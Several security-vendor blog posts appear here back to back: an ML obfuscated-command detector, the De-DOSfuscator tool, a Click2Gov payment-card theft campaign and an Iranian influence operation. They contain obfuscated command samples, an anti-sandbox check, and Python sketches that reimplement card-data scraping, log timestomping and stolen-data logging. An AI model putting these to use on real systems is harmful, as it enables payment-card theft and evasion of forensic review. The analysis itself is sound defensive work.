We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.
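
The sketch below computes a few of the features listed above and feeds them to scikit-learn’s gradient boosted tree classifier; the handful of inline samples is a placeholder for the labeled corpus described earlier, not real training data.

import math
import re
from collections import Counter
from sklearn.ensemble import GradientBoostingClassifier

def entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def features(cmdline):
    # A handful of the statistical features described above.
    return [
        len(cmdline),
        cmdline.count("^"),
        cmdline.count("|"),
        sum(c.isspace() for c in cmdline) / len(cmdline),
        len(re.findall(r"[^A-Za-z0-9\s]", cmdline)) / len(cmdline),
        entropy(cmdline),
        cmdline.lower().count("cmd") + cmdline.lower().count("power"),
    ]

# Placeholder training data: (command line, label) with 1 = obfuscated.
samples = [
    ("dir C:\\Users", 0),
    ("net use \\\\server\\share", 0),
    ('c^m^d /c "s^et x=ec^ho&&c^all %x% hi"', 1),
    ("%comspec:~0,3%%comspec:~-5,1% /c whoami", 1),
]
X = [features(c) for c, _ in samples]
y = [label for _, label in samples]

clf = GradientBoostingClassifier().fit(X, y)
print(clf.predict([features('p^o^w^e^r^s^h^e^l^l -enc AAA')]))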

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated, assigning an obfuscation score of only 19.7 percent (the complement of its confidence that the sample is non-obfuscated). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The CNN model also produced more misclassifications than the Gradient Boosted Tree model. Both of these results are most likely due to inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165 KB batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


Figure 2: Partial command decoding via the ECHO command

The script uses hundreds of commands to set environment variables that are ultimately expanded to de-obfuscate malicious commands. A tedious approach to de-obfuscating this script would be to de-fang each command by prepending an ECHO statement to print each de-obfuscated command to the console. Unfortunately, although the ECHO command can “decode” each command, BatchEncryption needs the SET commands to be executed to decode future commands. To decode this script while allowing the full malicious functionality to run as expected, you would have to iteratively and carefully echo and selectively execute a few hundred obfuscated SET commands.

The irony of BatchEncryption is that batch scripts are viewed as being easy to de-obfuscate, making binary code the safer place to hide logic from the prying eyes of network defenders. But BatchEncryption adds a formidable barrier to analysis by its extensive, layered use of environment variables to rebuild the original commands.

Taking Cmd of the Situation

I decided to see if it would be easier to instrument cmd.exe to log commands rather than de-obfuscating the script myself. To begin, I debugged cmd.exe, set a breakpoint on CreateProcessW, and executed a program from the command prompt. Figure 3 shows the call stack for CreateProcessW as cmd.exe executes notepad.


Figure 3: Call stack for CreateProcessW in cmd.exe

Starting from cmd!ExecPgm, I reviewed the disassembly of the above functions in cmd.exe to trace the origin of the command string up the call stack. I discovered cmd!Dispatch, which receives not a string but a structure with pointers to the command, arguments, and any I/O redirection information (such as redirecting the standard output or error streams of a program to a file or device). Testing revealed that these strings had all their environment variables expanded, which means we should be able to read the de-obfuscated commands from here.

Figure 4 is an exploration of this structure in WinDbg after running the command "echo hai > nul". This command prints the word hai to the standard output stream but uses the right-angle bracket to redirect standard output to the NUL device, which discards all data. The orange boxes highlight non-null pointers that got my attention during analysis, and the arrows point to the commands I used to discover their contents.


Figure 4: Exploring the interesting pointers in 2nd argument to cmd!Dispatch

Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and external programs, so hooking it, unlike breaking on CreateProcess, will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.
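
A stripped-down sketch of that parsing logic appears below. The structure offsets and the read_mem callback are placeholders for illustration only; the real offsets must be recovered from the cmd.exe disassembly (and differ between builds), and the actual script uses flare-qdb/Vivisect to read debuggee memory at a breakpoint on cmd!Dispatch.

import struct

# Hypothetical offsets into the structure passed to cmd!Dispatch (illustrative only).
OFF_CMD_PTR   = 0x08   # pointer to the expanded command string
OFF_ARGS_PTR  = 0x10   # pointer to the expanded argument string
OFF_REDIR_PTR = 0x18   # pointer to the first node of the I/O redirection list
OFF_NODE_NEXT = 0x00   # redirection node: next pointer
OFF_NODE_FILE = 0x10   # redirection node: pointer to the target filename

def read_ptr(read_mem, addr):
    return struct.unpack("<Q", read_mem(addr, 8))[0]

def read_wstr(read_mem, addr, maxlen=0x1000):
    # Read a NUL-terminated UTF-16LE string from debuggee memory.
    raw = read_mem(addr, maxlen)
    out = bytearray()
    for i in range(0, len(raw) - 1, 2):
        if raw[i:i + 2] == b"\x00\x00":
            break
        out += raw[i:i + 2]
    return out.decode("utf-16-le", "replace")

def dump_dispatch(read_mem, struct_addr):
    # read_mem(addr, size) -> bytes is supplied by the debugger harness.
    cmd = read_wstr(read_mem, read_ptr(read_mem, struct_addr + OFF_CMD_PTR))
    args = read_wstr(read_mem, read_ptr(read_mem, struct_addr + OFF_ARGS_PTR))
    line = (cmd + " " + args).strip()
    node = read_ptr(read_mem, struct_addr + OFF_REDIR_PTR)
    while node:                               # walk the redirection linked list
        target = read_wstr(read_mem, read_ptr(read_mem, node + OFF_NODE_FILE))
        line += " > " + target                # simplified: ignores stream numbers
        node = read_ptr(read_mem, node + OFF_NODE_NEXT)
    return line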

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and that location varies from system to system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves this function’s offset using Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset. You can then supply that output as the argument to the --useoff switch on your offline machine to tell De-DOSfuscator where the function is located. Alternatively, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows the De-DOSfuscator log after inducing the rest of the code to run.
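
Before moving on to the results in Figure 9, note that the check itself is trivial. The snippet below is a Python analogue of the logic, not the actual batch code, which (as described above) inspects the processor count via reg.exe before branching to its deletion label.

import os
import sys

def looks_like_sandbox():
    # Many analysis sandboxes are provisioned with a single vCPU, while most
    # modern physical hosts expose at least two cores to the guest.
    return (os.cpu_count() or 1) < 2

if looks_like_sandbox():
    print("single vCPU detected - XYNT.bat would 'goto del' and clean up here")
    sys.exit(0)
print("multiple vCPUs detected - execution would continue")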


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse with only one cross-reference that seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible from anywhere else in the code, it controls whether a function is called to dump information about the command that has just been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands because it dumps the tree in a preorder traversal rather than in the order the command was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appears to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle WebLogic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SJavaWebManage that were deleted, and code for handling webshell updates that was removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server; this functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

After editing a Click2Gov XML configuration file, the attacker used the SJavaWebManage CMDS page to restart a module in DEBUG mode. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to Click2Gov log files following the naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses Click2Gov log files to retrieve payment card data, formats the data, and prints it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments: year, month, and day, represented in a sample command line as: evil.exe 2018 09 01. In this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 through the present day. If a log file exists, FIREALARM copies its MAC (Modified, Accessed, Created) times so it can later timestomp the file back to its original times. Each log file is then read and parsed line by line. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line of the Click2GovCX log file, the temporary file THN1080.tmp is copied over the respective Click2GovCX log file and the timestamps are restored to the original, copied values. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2; a rough Python sketch of the sequence follows the workflow steps below.


Figure 2: FIREALARM workflow

  1. Attacker connects through Tor or another proxy and authenticates to SJavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through the log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, then overwrites the original log file and timestomps it with the original times.
  5. THN1080.tmp is deleted.
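
The log-handling sequence above can be approximated in Python for analysts who want to reason about it without running the sample. This is a rough sketch based solely on the behavior described in this post: the "field: value" separator and the timestamp handling (restoring the creation time requires Win32 APIs and is omitted) are assumptions rather than details recovered from the binary.

import os
import re
import shutil

# Field prefixes FIREALARM searches for (abbreviated from the list above).
FIELDS = ["medium.accountNumber", "medium.cvv2", "medium.expirationDate.year",
          "medium.expirationDate.month", "medium.firstName", "medium.lastName",
          "medium.contact.zip.code"]
TMP = os.path.join(os.environ.get("WINDIR", r"C:\Windows"), "Temp", "THN1080.tmp")

def process_log(path):
    st = os.stat(path)                          # remember the original timestamps
    error_lines, records = [], []
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            record = {}
            for field in FIELDS:
                m = re.search(re.escape(field) + r"\s*[:=]\s*(\S+)", line)
                if m:
                    record[field] = m.group(1)
            if record:
                records.append(record)          # FIREALARM prints these to the console
            if "ERROR -" in line:
                error_lines.append(line)        # only error entries are kept
    with open(TMP, "w") as tmp:
        tmp.writelines(error_lines)
    shutil.copy(TMP, path)                      # overwrite the original log file
    os.utime(path, (st.st_atime, st.st_mtime))  # timestomp accessed/modified times back
    os.remove(TMP)
    return records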

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence on the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++; it is installed or removed via command line arguments and runs as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i: Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u: Stops and deletes the gplcsvc service

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes it to the missing path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on ports 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs: the buffer exceeds 102399 bytes in size, or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these conditions occurs, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker connects through Tor or another proxy, authenticates to SJavaWebManage, and launches the File Manager.
  6. Attacker exfiltrates opt.log file.
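
Step 4 is straightforward to approximate in Python. The sketch below reproduces only the tag-extraction and logging behavior described above; buffer management, the service wrapper, and any formatting details of the real binary are omitted or assumed.

import base64
import re

TAGS = ["AccountNum", "CSC", "ExpDate", "FirstName", "LastName", "MInitial",
        "Street1", "Street2", "City", "State", "PostalCode"]
LOG_PATH = r"c:\windows\temp\opt.log"

def harvest(buffer_text):
    # Pull the value between each <op:TAG>...</op:TAG> pair, join the values
    # with '|', Base64 encode the record, and append it to the log file.
    values = []
    for tag in TAGS:
        m = re.search(r"<op:%s>(.*?)</op:%s>" % (tag, tag), buffer_text, re.S)
        values.append(m.group(1) if m else "")
    record = "|".join(values)
    encoded = base64.b64encode(record.encode()).decode()
    with open(LOG_PATH, "a") as fh:
        fh.write(encoded + "\n")
    return encoded

# Example with fabricated placeholder values (not real data):
# harvest("<op:FirstName>JANE</op:FirstName><op:LastName>DOE</op:LastName>")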

Attribution

Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run with least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware to exploit Click2Gov installations, achieving moderate success. Although the activity may reappear in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations of intrusions assessed as directly supporting nation-state or financially motivated operations that target organizations and involve interactive, focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, and TTPs leveraged by threat groups, and to quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East

FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the U.S., U.K., Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). The activity we have uncovered is significant, and demonstrates that actors beyond Russia continue to engage in and experiment with online, social media-driven influence operations to shape political discourse.

What Is This Activity?

Figure 1 maps the registration and content promotion connections between the various inauthentic news sites and social media account clusters we have identified thus far. This activity dates back to at least 2017. At the time of publication of this blog post, we continue to investigate and identify additional social media accounts and websites linked to this activity. For example, we have identified multiple Arabic-language, Middle East-focused sites that appear to be part of this broader operation that we do not address here.


Figure 1: Connections among components of suspected Iranian influence operation

We use the term “inauthentic” to describe sites that are not transparent in their origins and affiliations, undertake concerted efforts to mask these origins, and often use false social media personas to promote their content. The content published on the various websites consists of a mix of both original content and news articles appropriated, and sometimes altered, from other sources.

Who Is Conducting this Activity and Why?

Based on an investigation by FireEye Intelligence’s Information Operations analysis team, we assess with moderate confidence that this activity originates from Iranian actors. This assessment is based on a combination of indicators, including site registration data and the linking of social media accounts to Iranian phone numbers, as well as the promotion of content consistent with Iranian political interests. For example:

  • Registrant emails for the sites ‘Liberty Front Press’ and ‘Instituto Manquehue’ are associated with advertisements for website designers in Tehran and with the Iran-based site gahvare[.]com, respectively.
  • We have identified multiple Twitter accounts directly affiliated with the sites, as well as other associated Twitter accounts, that are linked to phone numbers with the +98 Iranian country code.
  • We have observed inauthentic social media personas, masquerading as American liberals supportive of U.S. Senator Bernie Sanders, heavily promoting Quds Day, a holiday established by Iran in 1979 to express support for Palestinians and opposition to Israel.

We limit our assessment regarding Iranian origins to moderate confidence because influence operations, by their very nature, are intended to deceive by mimicking legitimate online activity as closely as possible. While highly unlikely given the evidence we have identified, some possibility nonetheless remains that the activity could originate from elsewhere, was designed for alternative purposes, or includes some small percentage of authentic online behavior. We do not currently possess additional visibility into the specific actors, organizations, or entities behind this activity. Although the Iran-linked APT35 (Newscaster) has previously used inauthentic news sites and social media accounts to facilitate espionage, we have not observed any links to APT35.

Broadly speaking, the intent behind this activity appears to be to promote Iranian political interests, including anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as to promote support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). In the context of the U.S.-focused activity, this also includes significant anti-Trump messaging and the alignment of social media personas with an American liberal identity. However, it is important to note that the activity does not appear to have been specifically designed to influence the 2018 U.S. midterm elections, as it extends well beyond U.S. audiences and U.S. politics.

Conclusion

The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media-driven influence operations as a means of shaping political discourse. These operations extend well beyond those conducted by Russia, which has often been the focus of research into information operations over recent years. Our investigation also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.

Additional Details

The full report is available for download via the link at the top right of the page.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

